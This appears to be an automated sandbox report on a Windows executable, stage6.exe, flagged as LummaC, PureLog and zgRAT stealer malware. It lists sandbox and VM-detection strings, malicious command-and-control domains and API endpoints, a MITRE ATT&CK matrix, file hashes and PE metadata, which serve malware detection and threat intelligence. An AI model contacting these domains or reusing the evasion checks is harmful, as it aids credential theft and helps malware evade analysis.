Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: stage6.exe PID: 6272, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\stage6.exe	Memory allocated: 1660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Memory allocated: 33B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Memory allocated: 53B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe TID: 6652

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: stage6.exe, 00000001.00000002.1379141192.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual

Source: C:\Users\user\Desktop\stage6.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe

Code function: 1_2_0043C1F0 LdrInitializeThunk,

1_2_0043C1F0

Source: C:\Users\user\Desktop\stage6.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: rapeflowwj.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crosshuaht.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sustainskelet.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: aspecteirs.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: energyaffai.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: necklacebudi.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: discokeyus.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: grannyejh.lat
Source: stage6.exe, 00000000.00000002.1154647742.00000000043B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surmisehotte.click

Source: C:\Users\user\Desktop\stage6.exe

Process created: C:\Users\user\Desktop\stage6.exe "C:\Users\user\Desktop\stage6.exe"

Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe	Queries volume information: C:\Users\user\Desktop\stage6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\stage6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\stage6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: stage6.exe, type: SAMPLE
Source: Yara match	File source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: stage6.exe, type: SAMPLE
Source: Yara match	File source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: stage6.exe, type: SAMPLE
Source: Yara match	File source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1135848711.0000000000E82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: stage6.exe, type: SAMPLE
Source: Yara match	File source: 0.0.stage6.exe.e80000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
stage6.exe	59%	Virustotal		Browse
stage6.exe	64%	ReversingLabs	Win32.Trojan.Leonem
stage6.exe	100%	Avira	HEUR/AGEN.1323360
SAMPLE	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
crosshuaht.lat	100%	Avira URL Cloud	malware
https://rapeflowwj.lat/	100%	Avira URL Cloud	malware
energyaffai.lat	100%	Avira URL Cloud	malware
sustainskelet.lat	100%	Avira URL Cloud	malware
necklacebudi.lat	100%	Avira URL Cloud	malware
rapeflowwj.lat	100%	Avira URL Cloud	malware
https://necklacebudi.lat/api	100%	Avira URL Cloud	malware
https://surmisehotte.click/api	0%	Avira URL Cloud	safe
surmisehotte.click	0%	Avira URL Cloud	safe
aspecteirs.lat	100%	Avira URL Cloud	malware
grannyejh.lat	100%	Avira URL Cloud	malware
discokeyus.lat	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
surmisehotte.click	104.21.32.1	true	true	unknown
steamcommunity.com	23.52.218.12	true	false	high
sustainskelet.lat	unknown	unknown	true	unknown
crosshuaht.lat	unknown	unknown	true	unknown
rapeflowwj.lat	unknown	unknown	true	unknown
grannyejh.lat	unknown	unknown	true	unknown
aspecteirs.lat	unknown	unknown	true	unknown
discokeyus.lat	unknown	unknown	true	unknown
energyaffai.lat	unknown	unknown	true	unknown
necklacebudi.lat	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199724331900	false		high
necklacebudi.lat	true	Avira URL Cloud: malware	unknown
aspecteirs.lat	true	Avira URL Cloud: malware	unknown
energyaffai.lat	true	Avira URL Cloud: malware	unknown
https://surmisehotte.click/api	true	Avira URL Cloud: safe	unknown
surmisehotte.click	true	Avira URL Cloud: safe	unknown
sustainskelet.lat	true	Avira URL Cloud: malware	unknown
crosshuaht.lat	true	Avira URL Cloud: malware	unknown
rapeflowwj.lat	true	Avira URL Cloud: malware	unknown
grannyejh.lat	true	Avira URL Cloud: malware	unknown
discokeyus.lat	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://stackoverflow.com/q/14436606/23354	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=iOnz	stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://rapeflowwj.lat/	stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-net	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=djUBMuXjwA	stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=	stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://necklacebudi.lat/api	stage6.exe, 00000001.00000002.1379141192.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://github.com/mgravell/protobuf-neti	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	stage6.exe, 00000000.00000002.1157668581.0000000005CB0000.00000004.08000000.00040000.00000000.sdmp, stage6.exe, 00000000.00000002.1154647742.0000000004487000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	stage6.exe, 00000001.00000002.1379039032.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/	stage6.exe, 00000001.00000002.1379141192.0000000000C9D000.00000004.00000020.00020000.00000000.sdmp, stage6.exe, 00000001.00000002.1379141192.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	stage6.exe, 00000000.00000002.1145306123.00000000033B1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.32.1	surmisehotte.click	United States		13335	CLOUDFLARENETUS	true
23.52.218.12	steamcommunity.com	United States		27747	TelecentroSAAR	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1675329
Start date and time:	2025-04-27 05:32:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	stage6.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/0@10/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 80% Number of executed functions: 27 Number of non-executed functions: 67
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.29.183.29, 20.109.210.53
Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target stage6.exe, PID 6272 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:33:31	API Interceptor	9x Sleep call for process: stage6.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.32.1	QHT-CC250001-B(01).exe	Get hash	malicious	FormBook	Browse	www.6644win.mom/hs6j/
	setup_2gAmkpiuyl.exe	Get hash	malicious	Unknown	Browse	start7345724.ru/new/net_api
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	www.uqcdnvgr.biz/vhql/
	JMM259057# POD_ INVOICE.exe	Get hash	malicious	FormBook	Browse	www.6644win.mom/hs6j/
	BJfenN3Tx4VVygj.exe	Get hash	malicious	FormBook	Browse	www.896bt55fz.xyz/5fom/
	Purchase Order.exe	Get hash	malicious	FormBook	Browse	www.uqcdnvgr.biz/mfiy/
	YZTIBVYC.msi	Get hash	malicious	Unknown	Browse	cdn-upload-files.buzz/c
	SecuriteInfo.com.Win32.MalwareX-gen.31929.22299.exe	Get hash	malicious	FormBook	Browse	www.roastroots.lol/8cwp/
	Quotation List.exe	Get hash	malicious	FormBook	Browse	www.6644win.mom/hs6j/
	11042025-Payment-swift.exe	Get hash	malicious	FormBook	Browse	www.meshki-co-uk.shop/b8n0/
23.52.218.12	random.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	HL1YRkM.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer	Browse
	random.exe	Get hash	malicious	LummaC Stealer	Browse
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS	Browse
	05vwwzcgPF.exe	Get hash	malicious	LummaC Stealer	Browse
	Ethelium.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
steamcommunity.com	random.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, Credential Flusher, Healer AV Disabler, LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	HL1YRkM.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
surmisehotte.click	singl6.mp4.hta	Get hash	malicious	LummaC	Browse	104.21.64.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TelecentroSAAR	https://voiceoversecure.divineblizzsystems.com&d=DwMGaQ	Get hash	malicious	Unknown	Browse	23.52.210.234
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	HL1YRkM.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, CryptOne, LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
	random.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS	Browse	23.52.218.12
	05vwwzcgPF.exe	Get hash	malicious	LummaC Stealer	Browse	23.52.218.12
CLOUDFLARENETUS	Oblivora Setup.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	svchost.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.22.69.199
	InstallerV1.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.205.184
	250426-1adwksztb1.bin.exe	Get hash	malicious	Python Stealer, Blank Grabber, Exela Stealer, Umbral Stealer	Browse	162.159.138.232
	https://newsletter-editor.poweredbyintegra.dk/?NewsLetterTracker=true&bio=holstebrony&newsletter_ID=1&Text=Eget%20billede%20(ingen%20mellemrum)&Code=106&utcmabite=f9d0de3f-59af-46e8-b932-e8ab5db62f67&biocode=holstebrony&RedirectUrl=artisanglobaltour.com/fcrfr6/505388/bXRvcnJlc0B3YXRlcndvcmtzLmNvbQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.21.33.142
	Invio Ordine accompagnatorio n. 20250425-70611 del 04252025 - C.E.F. Srl.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	SecuriteInfo.com.FileRepMalware.29861.29138.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	RicevutaBonificoSepa1745392212214#U00b7PDF.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.64.1
	SecuriteInfo.com.Win64.Evo-gen.16193.28986.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.30.239
	DOCUMENTO_FA-45-04-2025.vbs	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	InstallerV1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	SecuriteInfo.com.FileRepMalware.29861.29138.msi	Get hash	malicious	Unknown	Browse	104.21.32.1 23.52.218.12
	SecuriteInfo.com.Win64.Evo-gen.16193.28986.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	_$kyLoad3rr.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	start.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	SentraX.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	LCrypt0rX.vbs	Get hash	malicious	LCRYX	Browse	104.21.32.1 23.52.218.12
	Payment Asvice in Doc.VBE.vbe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.32.1 23.52.218.12
	Luma_Crypt_Packlab.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12
	script.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.32.1 23.52.218.12

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.4951662203772385
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	stage6.exe
File size:	1'657'856 bytes
MD5:	03be1ee0944764446cd61be6ae8cc497
SHA1:	a8007574c5a81af39d193b19a29cc2fde8305f26
SHA256:	ca00dbff57cdc83f39a213ea96726063f18aa14f9a0ae2f52c2c6d54f23dcd00
SHA512:	5485608698ec5db99f298ef9d080ddaab94051c7d3411171e3f3ea996758d1843ff973f7dd2fcdba1532d43a51e51c5da70b25818ee9f6a0543e0cfdcb6026e4
SSDEEP:	24576:DHlYQzwg8Myznor627VGOTZ7ND3EvxSvqdbeyIAkmsHiEE1BNCmxZh+tEu8B:DG+6EVjZR3EpIqdyRms4Xh+th
TLSH:	C775BF03B6A78AF0E69C1B33C4E7881403E4D98577EFE71EB469335526113AADE0259F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.fg.................B...........a... ........@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x5961de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6766D52F [Sat Dec 21 14:48:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x196190	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x198000	0x568	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x19a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1941e4	0x194200	13cf54b1b8c948d473c300ce15d70740	False	0.7979122767166719	data	7.498920761662283	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x198000	0x568	0x600	54162d51ef77a776df8187ff113dc38e	False	0.4108072916666667	data	3.970234351915508	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x19a000	0xc	0x200	65d83e1f73a9e96c123f859063b8aad4	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1980a0	0x2dc	data			0.44672131147540983
RT_MANIFEST	0x19837c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	1
FileVersion	1.0.0.0
InternalName	1.exe
LegalCopyright	Copyright 2018
LegalTrademarks
OriginalFilename	1.exe
ProductName	1
